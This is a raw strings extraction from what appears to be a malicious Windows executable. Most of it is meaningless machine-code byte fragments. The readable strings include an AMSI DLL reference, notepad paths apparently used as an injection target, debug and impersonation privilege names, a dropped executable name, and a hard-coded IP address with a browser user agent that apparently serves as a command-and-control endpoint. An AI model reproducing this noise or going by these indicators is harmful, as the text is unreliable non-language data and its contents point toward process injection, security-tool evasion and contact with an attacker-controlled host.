!This program cannot be run in DOS mode.
`.data
.rdata
.edata
@.idata
.reloc
AWAVAUATL
[^_A\A]A^A_]
AWAVAUATUWVS1
[^_]A\A]A^A_
@[^_]A\
AUATWH
H[^_A\A]A^
amsi.dllATVSH
HHcA<H)
8[^_A\
AVAUATUWV1
@[^_]A\A]A^
ATUWVSH
[^_]A\A]A^A_
ATUWVSH
x[^_]A\A]A^A_
([^_]A\A]
[^_]A\A]
h[^_]A\A]A^A_
AUATWVSH
[^_A\A]]
AUATUWVSH
@[^_]A\A]A^
AWAVAUI
ATWVSH
[^_A\A]A^A_
AVAUATUWVSH
x[^_]A\A]A^A_
[^_A\A]A^]
AWAVAUI
ATUWVSH
[^_]A\A]A^A_
AVAUATI
[_A\A]A^
AWAVAUATI
[^_]A\A]A^A_
PA\A]A^
[A\A]A^
AWAVAUI
ATUWVSH
L$x9t$d
L$pD9|$`
[^_]A\A]A^A_
D9l$dv
9\$hv6
[^_]A\A]A^A_
[^A\A]]
AWAVAUI
ATWVSH
[^_A\A]A^A_]
[^_A\A]A^A_]
ATUWVSH
@[^_]A\A]A^
AWAVAUI
H[^A\A]A^A_
H[^A\A]A^A_
[^A\A]A^A_
AWAVAUI
ATUWVSH
[^_]A\A]A^A_
|$\A9m
[^_]A\A]A^A_
[^_]A\A]A^A_
AUATSH
[A\A]A^
AUATUWVSH
P[^_]A\A]A^
ADVAPI32L
CRYPT32
MSCorEE
OleAut32H
D$0Userf
Shell32
D$0msvcf
kernelbaH
cryptsp
winhttp
iphlpapiH
D$0gdi3H
D$0wkscf
NetApi32H
D$0Ws2_f
D$0Dnsaf
AUATWSH
[_A\A]A^
AWAVAUATUWVD
H[^_]A\A]A^A_
[^_]A\A]A^
AVAUATWVSH
;t$dw-Hc
[^_A\A]A^]
([^_A\
ATWVSH
H[^_A\
AWAVAUATWVSH
[^_A\A]A^A_]
v4.0.303H
AWAVAUATUWVS1
[^_]A\A]A^A_
t HcA<
AWAVAUATI
[^_]A\A]A^A_
[^_]A\A]A^A_
[^_]A\
AVAUATUH
[^_]A\A]A^A_
[^_]A\
AVAUATUWVSH
@[^_]A\A]A^
[^_]A\A]A^A_
AVAUATI
X[^_]A\A]A^A_
H[A\A]A^
H[A\A]A^
twATUL
[^_]A\
AVAUE1
[^_]A\A]A^A_
[^_]A\
AVAUATWL
[^_A\A]A^A_]
AVAUATE1
@[^_]A\A]A^
AUATUWVL
[^_]A\A]A^A_
[^_A\A]A^
[^_A\A]A^
@[^_]A\
ATUWVSL
@[^_]A\A]A^
ATUWVSH
P[^_]A\
[^_]A\A]A^
ATWVSH
8[^_A\
AUATE1
D$PHcC<H
t$49t$0
D$lNtL
[^_]A\A]A^A_
AVAUATW1
IcD$<I
@[^_A\A]A^A_
AUATUL
[^_]A\A]A^
[^_]A\
AVAUATWVSH
[^_A\A]A^A_
H[^A\A]
AVAUATUWVSH
[^_]A\A]A^A_
C:\Windows\System32\notepad.exe
C:\Windows\SysWOW64\notepad.exe
SeDebugPrivilege
SeImpersonatePrivilege
975c89f387.exe
38.54.107.202
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-type: */*
\??\C:\Windows\System32\ntdll.dll